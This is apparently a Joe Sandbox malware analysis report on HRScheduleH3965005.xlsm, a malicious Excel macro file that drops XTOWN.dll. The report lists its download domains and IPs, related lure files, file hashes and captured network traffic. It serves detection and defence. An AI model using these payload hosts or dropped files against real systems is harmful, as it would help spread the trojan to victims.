13.224.92.73     dr49lng3n1n2s.cloudfront.net    United States   16509   AMAZON-02US        false
172.67.213.115   astrocycle.download             United States   13335   CLOUDFLARENETUS    true
172.67.146.88    uppercilio.fun                  United States   13335   CLOUDFLARENETUS    false
172.67.194.117   voopeople.fun                   United States   13335   CLOUDFLARENETUS    false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444771
Start date: 06.07.2021
Start time: 17:01:28
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: HRScheduleH3965005.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 65.4% (good quality ratio 51.5%)
• Quality average: 59.5%
• Quality standard deviation: 39.6%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 12
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
172.67.198.51 | PI-9823472110866.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | uhr908723097306.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Vac.list07-2021-6014910.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Vac.list07-20214862208.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | List-4527768.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | HRcontacts7752205.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | sbf0127365-7431059.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Outfordelivery799862.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Purchaseconfirmation-137606.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | DeliveryConf535215.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | PI-210610.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
13.224.92.73 | sbf0127365-7431059.xlsm | malicious |
13.224.92.73 | Outfordelivery799862.xlsm | malicious |
13.224.92.73 | Purchaseconfirmation-137606.xlsm | malicious |
13.224.92.73 | DeliveryConf535215.xlsm | malicious |
172.67.213.115 | PI-9823472110866.xlsm | malicious | astrocycle.download/
172.67.213.115 | uhr908723097306.xlsm | malicious | astrocycle.download/
172.67.213.115 | Vac.list07-2021-6014910.xlsm | malicious | astrocycle.download/
172.67.213.115 | List-4527768.xlsm | malicious | astrocycle.download/
172.67.213.115 | HRcontacts7752205.xlsm | malicious | astrocycle.download/
172.67.213.115 | sbf0127365-7431059.xlsm | malicious | astrocycle.download/
172.67.213.115 | Purchaseconfirmation-137606.xlsm | malicious | astrocycle.download/
172.67.213.115 | DeliveryConf535215.xlsm | malicious | astrocycle.download/
172.67.213.115 | PI-210610.xlsm | malicious | astrocycle.download/

Domains

Match | Associated Sample Name / URL | Detection | Context
astrocycle.download | PI-9823472110866.xlsm | malicious | 172.67.213.115
astrocycle.download | uhr908723097306.xlsm | malicious | 172.67.213.115
astrocycle.download | Vac.list07-2021-6014910.xlsm | malicious | 172.67.213.115
astrocycle.download | Vac.list07-20214862208.xlsm | malicious | 104.21.37.209
astrocycle.download | List-4527768.xlsm | malicious | 172.67.213.115
astrocycle.download | HRcontacts7752205.xlsm | malicious | 172.67.213.115
astrocycle.download | Formtofill4184860.xlsm | malicious | 104.21.37.209
astrocycle.download | sbf0127365-7431059.xlsm | malicious | 172.67.213.115
astrocycle.download | Outfordelivery799862.xlsm | malicious | 104.21.37.209
astrocycle.download | Purchaseconfirmation-137606.xlsm | malicious | 172.67.213.115
astrocycle.download | DeliveryConf535215.xlsm | malicious | 172.67.213.115
astrocycle.download | PI-210610.xlsm | malicious | 172.67.213.115
voopeople.fun | PI-9823472110866.xlsm | malicious | 104.21.12.122
voopeople.fun | uhr908723097306.xlsm | malicious | 172.67.194.117
voopeople.fun | Vac.list07-2021-6014910.xlsm | malicious | 172.67.194.117
voopeople.fun | Vac.list07-20214862208.xlsm | malicious | 172.67.194.117
voopeople.fun | List-4527768.xlsm | malicious | 172.67.194.117
voopeople.fun | HRcontacts7752205.xlsm | malicious | 172.67.194.117
voopeople.fun | Formtofill4184860.xlsm | malicious | 172.67.194.117
voopeople.fun | sbf0127365-7431059.xlsm | malicious | 104.21.12.122
voopeople.fun | Outfordelivery799862.xlsm | malicious | 172.67.194.117
voopeople.fun | Purchaseconfirmation-137606.xlsm | malicious | 172.67.194.117
voopeople.fun | DeliveryConf535215.xlsm | malicious | 172.67.194.117
voopeople.fun | PI-210610.xlsm | malicious | 172.67.194.117
thousandsyears.download | PI-9823472110866.xlsm | malicious | 172.67.198.51
thousandsyears.download | uhr908723097306.xlsm | malicious | 172.67.198.51
thousandsyears.download | Vac.list07-2021-6014910.xlsm | malicious | 172.67.198.51
thousandsyears.download | Vac.list07-20214862208.xlsm | malicious | 172.67.198.51
thousandsyears.download | List-4527768.xlsm | malicious | 172.67.198.51
thousandsyears.download | HRcontacts7752205.xlsm | malicious | 172.67.198.51
thousandsyears.download | Formtofill4184860.xlsm | malicious | 104.21.52.111
thousandsyears.download | sbf0127365-7431059.xlsm | malicious | 172.67.198.51
thousandsyears.download | Outfordelivery799862.xlsm | malicious | 172.67.198.51
thousandsyears.download | Purchaseconfirmation-137606.xlsm | malicious | 172.67.198.51
thousandsyears.download | DeliveryConf535215.xlsm | malicious | 172.67.198.51
thousandsyears.download | PI-210610.xlsm | malicious | 172.67.198.51
uppercilio.fun | PI-9823472110866.xlsm | malicious | 172.67.146.88
uppercilio.fun | uhr908723097306.xlsm | malicious | 104.21.55.83
uppercilio.fun | Vac.list07-2021-6014910.xlsm | malicious | 104.21.55.83
uppercilio.fun | Vac.list07-20214862208.xlsm | malicious | 172.67.146.88
uppercilio.fun | List-4527768.xlsm | malicious | 172.67.146.88
uppercilio.fun | HRcontacts7752205.xlsm | malicious | 104.21.55.83
uppercilio.fun | Formtofill4184860.xlsm | malicious | 172.67.146.88
uppercilio.fun | sbf0127365-7431059.xlsm | malicious | 104.21.55.83
uppercilio.fun | Outfordelivery799862.xlsm | malicious | 104.21.55.83
uppercilio.fun | Purchaseconfirmation-137606.xlsm | malicious | 104.21.55.83
uppercilio.fun | DeliveryConf535215.xlsm | malicious | 104.21.55.83
uppercilio.fun | PI-210610.xlsm | malicious | 104.21.55.83

ASN

Match             Associated Sample Name / URL                  Detection   Context
CLOUDFLARENETUS   Cava.com_Fax-Message.htm                      malicious   104.16.18.94
                  VM52MC9YQDUO0P.html                           malicious   104.16.18.94
                  PI-9823472110866.xlsm                         malicious   104.21.12.122
                  uhr908723097306.xlsm                          malicious   172.67.194.117
                  Vac.list07-2021-6014910.xlsm                  malicious   172.67.194.117
                  Vac.list07-20214862208.xlsm                   malicious   172.67.194.117
                  List-4527768.xlsm                             malicious   172.67.194.117
                  HRcontacts7752205.xlsm                        malicious   172.67.194.117
                  Formtofill4184860.xlsm                        malicious   172.67.194.117
                  sbf0127365-7431059.xlsm                       malicious   104.21.12.122
                  runsys32.dll                                  malicious   104.20.185.68
                  Outfordelivery799862.xlsm                     malicious   172.67.194.117
                  Purchaseconfirmation-137606.xlsm              malicious   172.67.194.117
                  DeliveryConf535215.xlsm                       malicious   172.67.194.117
                  SMR8OzIgNB.exe                                malicious   104.21.8.151
                  Follow up Purchase order num- 4500262450.exe  malicious   104.21.75.42
                  PI-210610.xlsm                                malicious   172.67.194.117
                  2790000.dll                                   malicious   104.20.185.68
                  2770174.dll                                   malicious   104.20.185.68
                  Payment Invoice.exe                           malicious   172.67.188.154
AMAZON-02US       Enquiry#List For Order070621.exe              malicious   13.59.53.244
                  PI-9823472110866.xlsm                         malicious   143.204.91.74
                  uhr908723097306.xlsm                          malicious   143.204.91.74
                  Vac.list07-2021-6014910.xlsm                  malicious   143.204.91.74
                  Vac.list07-20214862208.xlsm                   malicious   143.204.91.74
                  List-4527768.xlsm                             malicious   13.225.75.73
                  HRcontacts7752205.xlsm                        malicious   13.225.75.73
                  Formtofill4184860.xlsm                        malicious   13.225.75.73
                  sbf0127365-7431059.xlsm                       malicious   13.224.92.73
                  Reciept 19129475.xlsb                         malicious   54.191.98.150
                  Outfordelivery799862.xlsm                     malicious   13.224.92.73
                  Purchaseconfirmation-137606.xlsm              malicious   13.224.92.73
                  DeliveryConf535215.xlsm                       malicious   13.224.92.73
                  PI-210610.xlsm                                malicious   143.204.4.74
                  GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi            malicious   18.231.168.212
                  39d0c1e7.msi                                  malicious   3.143.159.48
                  Movcy_v1.0.0.apk                              malicious   52.39.180.2
                  order No. 00192099##001 pdf.exe               malicious   3.143.65.214
                  f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll  malicious   143.204.91.74
                  lZYIQJNUsZ.exe                                malicious   13.249.12.162

JA3 Fingerprints

Match                              Associated Sample Name / URL      Detection   Context
05af1f5ca1b87cc9cc9b25185115607d   PI-9823472110866.xlsm             malicious   13.224.92.73
                                   uhr908723097306.xlsm              malicious   13.224.92.73
                                   Vac.list07-2021-6014910.xlsm      malicious   13.224.92.73
                                   Vac.list07-20214862208.xlsm       malicious   13.224.92.73
                                   List-4527768.xlsm                 malicious   13.224.92.73
                                   HRcontacts7752205.xlsm            malicious   13.224.92.73
                                   Formtofill4184860.xlsm            malicious   13.224.92.73
                                   sbf0127365-7431059.xlsm           malicious   13.224.92.73
                                   Outfordelivery799862.xlsm         malicious   13.224.92.73
                                   Purchaseconfirmation-137606.xlsm  malicious   13.224.92.73
                                   DeliveryConf535215.xlsm           malicious   13.224.92.73
                                   PI-210610.xlsm                    malicious   13.224.92.73
                                   108020075.exe                     malicious   13.224.92.73
                                   G-DECL G50 EURL.xlsx              malicious   13.224.92.73
                                   1.doc                             malicious   13.224.92.73
                                   DECL G50 EURL!.xlsx               malicious   13.224.92.73
                                   Order No. 211128.doc              malicious   13.224.92.73
                                   SOA.xlsx                          malicious   13.224.92.73
                                   DECL G50 EURL.xlsx                malicious   13.224.92.73
                                   WO 378871.xlsb                    malicious   13.224.92.73

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
PI-9823472110866.xlsm: malicious
uhr908723097306.xlsm: malicious
Vac.list07-2021-6014910.xlsm: malicious
Vac.list07-20214862208.xlsm: malicious
List-4527768.xlsm: malicious
HRcontacts7752205.xlsm: malicious
Formtofill4184860.xlsm: malicious
sbf0127365-7431059.xlsm: malicious
Outfordelivery799862.xlsm: malicious
Purchaseconfirmation-137606.xlsm: malicious
DeliveryConf535215.xlsm: malicious
PI-210610.xlsm: malicious
Match: C:\Users\user\XTOWN.dll
PI-9823472110866.xlsm: malicious
uhr908723097306.xlsm: malicious
Vac.list07-2021-6014910.xlsm: malicious
Vac.list07-20214862208.xlsm: malicious
List-4527768.xlsm: malicious
HRcontacts7752205.xlsm: malicious
Formtofill4184860.xlsm: malicious
sbf0127365-7431059.xlsm: malicious
Outfordelivery799862.xlsm: malicious
Purchaseconfirmation-137606.xlsm: malicious
DeliveryConf535215.xlsm: malicious
PI-210610.xlsm: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: PI-9823472110866.xlsm, Detection: malicious
• Filename: uhr908723097306.xlsm, Detection: malicious
• Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious
• Filename: Vac.list07-20214862208.xlsm, Detection: malicious
• Filename: List-4527768.xlsm, Detection: malicious
• Filename: HRcontacts7752205.xlsm, Detection: malicious
• Filename: Formtofill4184860.xlsm, Detection: malicious
• Filename: sbf0127365-7431059.xlsm, Detection: malicious
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2027E4.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 174009
Entropy (8bit): 7.967231122944825
Encrypted: false
SSDEEP: 3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5: C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1: AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256: D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512: 131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\Desktop\~$HRScheduleH3965005.xlsm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\XTOWN.dll
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: PI-9823472110866.xlsm, Detection: malicious
• Filename: uhr908723097306.xlsm, Detection: malicious
• Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious
• Filename: Vac.list07-20214862208.xlsm, Detection: malicious
• Filename: List-4527768.xlsm, Detection: malicious
• Filename: HRcontacts7752205.xlsm, Detection: malicious
• Filename: Formtofill4184860.xlsm, Detection: malicious
• Filename: sbf0127365-7431059.xlsm, Detection: malicious
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.9394014867391105
TrID:
• Excel Microsoft Office Open XML Format document (40004/1) 83.33%
• ZIP compressed archive (8000/1) 16.67%
File name: HRScheduleH3965005.xlsm
File size: 189905
MD5: 1799e36c7dcdafacaf883a1f9d92f62f
SHA1: d49cb116574bedd7a18eb99b3f74f9b10964f3f8
SHA256: 1756dea333ae5179a904c49f5fb16b76b03208cce0c05953552a46fd37e685f7
SHA512: 4c1dc060993014ecefcaf176efea0183a1e71b0d7e0a3b7b901080acd4ac57308e049823bda9e939eaba4922a4cbaa136f34e6ca6afeea1f403d5d3df86d7e47
SSDEEP: 3072:iDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:QRcGUlFzy4mpTHdrUc3/SsYASx
File Content Preview: PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash: e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jul 6, 2021 17:02:21.984983921 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:02:22.023418903 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:02:22.023545980 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:02:22.024257898 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:02:22.062422991 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:02:22.076168060 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:02:22.076194048 CEST  80           49167      172.67.198.51   192.168.2.22
Jul 6, 2021 17:02:22.076263905 CEST  49167        80         192.168.2.22    172.67.198.51
Jul 6, 2021 17:02:22.164635897 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.203766108 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.207357883 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.208049059 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.255321026 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.280752897 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.280826092 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.280878067 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.280920029 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.280934095 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.280947924 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.280951977 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281004906 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281049013 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281089067 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281110048 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281120062 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281126022 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281145096 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281147957 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281160116 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281163931 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281205893 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281208038 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281255960 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281810999 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281851053 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.281896114 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.281924009 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.283183098 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.283257008 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.283260107 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.284198046 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.284220934 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.284244061 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.284257889 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.284261942 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.284264088 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.284914970 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.285445929 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.285495996 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.285559893 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.285588980 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.286668062 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.286705971 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.286921978 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.287934065 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.287971020 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.288022995 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.288043022 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.289220095 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.289258957 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.289299011 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.289315939 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.290294886 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.290326118 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.290380955 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.290396929 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.291589975 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.291659117 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.291707039 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.291790009 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.292726994 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.292759895 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.292800903 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.292817116 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.320130110 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.320164919 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.320249081 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.320373058 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.320511103 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.320549011 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.320579052 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.320597887 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.321737051 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.321772099 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.321830034 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.322137117 CEST  49168        80         192.168.2.22    172.67.194.117
Jul 6, 2021 17:02:22.323044062 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.323084116 CEST  80           49168      172.67.194.117  192.168.2.22
Jul 6, 2021 17:02:22.323148966 CEST  49168        80         192.168.2.22    172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.323184967 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.324201107 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.324239969 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.324320078 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.324394941 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.325392008 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.325458050 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.325551033 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.325577021 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.326828957 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.326860905 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.326925993 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.329344034 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.407464027 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.445766926 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.445899963 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.447182894 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.485187054 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579262018 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579315901 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579355955 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579380035 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.614377022 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.654616117 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.654751062 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.666316986 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.705923080 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.705960989 CEST4434917013.224.92.73192.168.2.22
